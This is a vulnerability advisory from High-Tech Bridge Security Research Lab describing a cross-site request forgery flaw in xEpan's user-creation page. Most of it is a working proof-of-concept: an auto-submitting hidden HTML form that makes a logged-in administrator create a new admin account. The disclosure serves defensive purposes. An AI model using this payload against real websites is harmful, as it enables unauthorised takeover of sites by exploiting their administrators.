High-Tech Bridge Security Research Lab discovered vulnerability in xEpan, which can be exploited to compromise vulnerable web site.
The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user accounts. A remote unauthenticated attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit, create new account with administrative privileges and get total control over the vulnerable website.
A simple CSRF exploit below creates an administrative account with username “immuniweb” and password “password”:
<form action=“http://[host]/?page=owner/users&web_owner_users_crud_virtualpage=add &submit=web_web_owner_users_crud_virtualpage_form” method=“post” name=“main”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_name” value=“name”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_email” value="[email protected]">
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_username” value=“immuniweb”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_password” value=“password”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_created_at” value=“21/10/2014”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_type” value=“100”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_is_active” value=“1”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_activation_code” value=“”>
<input type=“hidden” name=“web_web_owner_users_crud_virtualpage_form_last_login_date” value=“”>
<input type=“hidden” name=“ajax_submit” value=“form_submit”>
<input type=“submit” id=“btn”>
</form>
<script>
document.main.submit();
</script>